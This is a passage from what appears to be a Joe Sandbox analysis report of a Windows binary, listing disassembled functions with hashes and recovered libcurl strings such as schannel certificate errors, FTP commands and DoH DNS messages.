                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_UNKNOWN_ETYPE
                            • API String ID: 1435330505-2300855807
                            • Opcode ID: dd1ac629be1cd07c5373d2a5811cd7d8860cd33eaa1cb76954666a5eefee97bc
                            • Instruction ID: 3ebffb118a16708ffe9f0b471c55d473a305ce89e25501837c354c8defb09314
                            • Opcode Fuzzy Hash: dd1ac629be1cd07c5373d2a5811cd7d8860cd33eaa1cb76954666a5eefee97bc
                            • Instruction Fuzzy Hash: DD118F26618A4285E7A9FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_UNABLE_TO_REFER
                            • API String ID: 1435330505-1677429073
                            • Opcode ID: b23b7420c7e163b49ed81d033c24075b049a41e11dc10c77c8544a8578a14ffa
                            • Instruction ID: 7a5468348f5fc6a5c0eca9cb25d4312e3cb49111c622cf9d2ccd6cf8e08fc470
                            • Opcode Fuzzy Hash: b23b7420c7e163b49ed81d033c24075b049a41e11dc10c77c8544a8578a14ffa
                            • Instruction Fuzzy Hash: 05118F26618A4285E7A8FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_LOGON_DENIED
                            • API String ID: 1435330505-3139097263
                            • Opcode ID: 710a176b6175d03d4d1190c66f5ab75de5512d9aa6ab26a5f5e39b0f7f4f0251
                            • Instruction ID: 1221c66b4bbdf03d5283876577c942cc1f9db1ae6c52d5425d81e2b8a25a3eba
                            • Opcode Fuzzy Hash: 710a176b6175d03d4d1190c66f5ab75de5512d9aa6ab26a5f5e39b0f7f4f0251
                            • Instruction Fuzzy Hash: 51118F22618A4286E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_CERT_REVOKED
                            • API String ID: 1435330505-392938328
                            • Opcode ID: 31050e1a7bab2b163812165b7f916e594586f4ea9503c75469ba3fa8aa7768b5
                            • Instruction ID: 1e164377d8895ec74e9dc3a2db5c72dc432df510cc2034708ab9e3027d3660b5
                            • Opcode Fuzzy Hash: 31050e1a7bab2b163812165b7f916e594586f4ea9503c75469ba3fa8aa7768b5
                            • Instruction Fuzzy Hash: 1D118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_INVALID_REQUEST
                            • API String ID: 1435330505-4043682555
                            • Opcode ID: 5b100ee6c80bd475dd4efe02c8c1e52e4cb1157a3b8d4765f2ae338aa4e90b31
                            • Instruction ID: 2878e7235facc03d94e854a9fd2711ecc03eefed03a0225af7835fcb82a16579
                            • Opcode Fuzzy Hash: 5b100ee6c80bd475dd4efe02c8c1e52e4cb1157a3b8d4765f2ae338aa4e90b31
                            • Instruction Fuzzy Hash: 22118F26618A4285E7A8FF10A0502FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_ISSUING_CA_UNTRUSTED
                            • API String ID: 1435330505-2125857805
                            • Opcode ID: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
                            • Instruction ID: 18251ae4882eeb17dd253d3fe0f1358c719dee86b8dedf6918ce728565fccd39
                            • Opcode Fuzzy Hash: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
                            • Instruction Fuzzy Hash: EF118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE427D6DFBCD845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_CERT_EXPIRED
                            • API String ID: 1435330505-3011920606
                            • Opcode ID: f2eaa38f4bdb51e9d98bf4c94020deb6bee76419868caccc4ec89c7b18a03b11
                            • Instruction ID: 316b7823a15e8080486d775d702a3a44b9bf5c5637901e03d21998a2c8fdac99
                            • Opcode Fuzzy Hash: f2eaa38f4bdb51e9d98bf4c94020deb6bee76419868caccc4ec89c7b18a03b11
                            • Instruction Fuzzy Hash: 09118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCE845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_ISSUING_CA_UNTRUSTED_KDC
                            • API String ID: 1435330505-1164189158
                            • Opcode ID: d6fdd00396279cafc7e921ad01c17cb7e8f560e99260aecc5d2f6ecaa636a8f4
                            • Instruction ID: ac2eaae3f1f1a2b1bd9c8fce598099210e9f74f2410e56ac01355e4dbb9d2fe6
                            • Opcode Fuzzy Hash: d6fdd00396279cafc7e921ad01c17cb7e8f560e99260aecc5d2f6ecaa636a8f4
                            • Instruction Fuzzy Hash: FB116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$_strdupmallocstrncpy
                            • String ID: ://$|<>"?*
                            • API String ID: 985501230-1792949323
                            • Opcode ID: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
                            • Instruction ID: 5aedf571f90ab94b18ba8cb3024f56ce7b8aeaf7d1c6c9f8e9acdca3a772c9ab
                            • Opcode Fuzzy Hash: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
                            • Instruction Fuzzy Hash: 80519062A0D78241FB1AAF61A550379EAB0AF41B94FC88531CD7D077C5EFBCE84183A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • schannel: server certificate name verification failed, xrefs: 00007FF7F1DE96C7
                            • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 00007FF7F1DE9680
                            • schannel: CertGetNameString() returned no certificate name information, xrefs: 00007FF7F1DE959E
                            • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 00007FF7F1DE96DB
                            • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 00007FF7F1DE95F4
                            • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 00007FF7F1DE9669
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _strdupfree
                            • String ID: schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
                            • API String ID: 1865132094-4178580626
                            • Opcode ID: 0957ef3460ac251cf8b0ca2eb992f015c0435e8d2265aaedf546ffa94fe6991e
                            • Instruction ID: fa723fa59f8138a82b5e4a790cb7b9e53e4361803c7fdcfb5398102929dc84fd
                            • Opcode Fuzzy Hash: 0957ef3460ac251cf8b0ca2eb992f015c0435e8d2265aaedf546ffa94fe6991e
                            • Instruction Fuzzy Hash: CC41D011A0E34251FB1DFB12A5A01799760AB45BEAFC4823ADD3E037C5DFACE505C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: APPE %s$Could not seek stream$Failed to read data$File already completely uploaded$SIZE %s$STOR %s
                            • API String ID: 1488884202-2774612732
                            • Opcode ID: c3c9e7fcece5608abaea014060957f5e03f9ba11dc3049f54b6d1dcb31443723
                            • Instruction ID: 632edbccc91fe59a14ba8bc56cc2dc013454d96fc2b417e7a137a5979f37a41f
                            • Opcode Fuzzy Hash: c3c9e7fcece5608abaea014060957f5e03f9ba11dc3049f54b6d1dcb31443723
                            • Instruction Fuzzy Hash: 7E518072A0A78295EB54AF15D4443E9B7B0EB48B98F884036DE2D073D5DFBCE445C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _strdup
                            • String ID: %s/%s$Can't open '%s'!$Failed to extract a sensible file name from the URL to use for storage!$Remote file name has no length!
                            • API String ID: 1169197092-535971604
                            • Opcode ID: ee096501a0cd2191b4ba210116b6c336875ef3882e53d920967fc493fee0e01d
                            • Instruction ID: f7c4e2b70e0616594ccb8994f9fbbb7792f2f6b438eb02b39823bf5e92e69df5
                            • Opcode Fuzzy Hash: ee096501a0cd2191b4ba210116b6c336875ef3882e53d920967fc493fee0e01d
                            • Instruction Fuzzy Hash: 83319F51A0AB8B91FB15FB219058579A3B1BF05784FC68431CA2E4B2D9EFACF415C3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast_errno$FormatMessage__swprintf_lwcstombs
                            • String ID: Unknown error %u (0x%08X)
                            • API String ID: 349418278-1058733786
                            • Opcode ID: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
                            • Instruction ID: 86daa41c1250cb680d61394db08a7fdc00ae24093aa2529108f08d2cba3538c0
                            • Opcode Fuzzy Hash: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
                            • Instruction Fuzzy Hash: 35113C35A08B4186E715BF11A804169F771AB88B81FC88434DA5E03795CFFCE440DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1DBFF17
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1DBFF31
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1DBFF54
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncmp
                            • String ID: ../$/..$/../$/./
                            • API String ID: 1114863663-456519384
                            • Opcode ID: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
                            • Instruction ID: b20878fad7b621c9a83139a9f18256b9b9bf387ca2aaed12002aeb9df91e625a
                            • Opcode Fuzzy Hash: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
                            • Instruction Fuzzy Hash: F861E315E0C69381FB26FB259410239EBB0AB0AB95F898431C97E072D5DFADE445D3F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strcmp
                            • String ID: %s%s$%s%s=%s$127.0.0.1$Cookie$Cookie: $[::1]$localhost
                            • API String ID: 1004003707-4114525121
                            • Opcode ID: 357ef3ad0b3f9e20b0f224f09ca8fdbbc26fba3f2290071df037ae5b11181cc7
                            • Instruction ID: 6eacf37571206dfc57c272beb2a023b5757e45d95b7a08d856963cb652999124
                            • Opcode Fuzzy Hash: 357ef3ad0b3f9e20b0f224f09ca8fdbbc26fba3f2290071df037ae5b11181cc7
                            • Instruction Fuzzy Hash: 3D51BD22B08A5390EB19FB16A5102B5A3A4AF51BC8FC84431DD2D5B3D5EFBCE905C3E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: $%%%02x
                            • API String ID: 0-2848173732
                            • Opcode ID: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
                            • Instruction ID: 1190da22590b838663d3410d81728545392f54684a3112ace578124d6a6dd184
                            • Opcode Fuzzy Hash: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
                            • Instruction Fuzzy Hash: 5C02A321A0C68646FB6DFB259554279E7B0AF45744FC84231CAAE027D2DFEDF806C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$__acrt_iob_func__swprintf_lstrtoul
                            • String ID: %0*lu$internal error: invalid pattern type (%d)
                            • API String ID: 147458867-449433499
                            • Opcode ID: 0b69f141a8b0f3f8637c97fda2f10c83fc7105382c602c7297efb503ea8d356f
                            • Instruction ID: 2659bd580d03c713d39fc6a173d1ed50a3d617b43b7cadc6e4d7c60ecd08b194
                            • Opcode Fuzzy Hash: 0b69f141a8b0f3f8637c97fda2f10c83fc7105382c602c7297efb503ea8d356f
                            • Instruction Fuzzy Hash: 1151A122F0865285FB14EB66D8402BDA771BB04758F844239CE2D577CADFBCE545D3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLasthtonssend
                            • String ID: Sending data failed (%d)
                            • API String ID: 2027122571-2319402659
                            • Opcode ID: ac28d95ee593118a1bd79356cac12dfad59719ed3054deb94d4855cc856bdb5b
                            • Instruction ID: fea0629205f17c8ec0364dfda05fe5056fc1e4e821390afcbe7c34f7da0c902c
                            • Opcode Fuzzy Hash: ac28d95ee593118a1bd79356cac12dfad59719ed3054deb94d4855cc856bdb5b
                            • Instruction Fuzzy Hash: D641AD32608A8681E704AF75D454AA8B730F754F89FC44632DB69073A8DFBCE046C391
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: %s%02x%02x$CNAME: %s$DoH A: %u.%u.%u.%u$DoH AAAA: $TTL: %u seconds
                            • API String ID: 1488884202-408633105
                            • Opcode ID: af9628eb09a8a4b8b72db40548a2d0d273c778839f9fc3eaed13a981285f9ad7
                            • Instruction ID: 2fc20af6bf2b9f47872057c216186eee1d929f77d2277c976a83656e7715afa4
                            • Opcode Fuzzy Hash: af9628eb09a8a4b8b72db40548a2d0d273c778839f9fc3eaed13a981285f9ad7
                            • Instruction Fuzzy Hash: 8741A573A0868295D764EF15B4106AAB770FB447A5F84423AEEBE066C5CFBCD141CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: ACCT %s$ACCT requested but none available$Access denied: %03d$PASS %s
                            • API String ID: 1488884202-2304280848
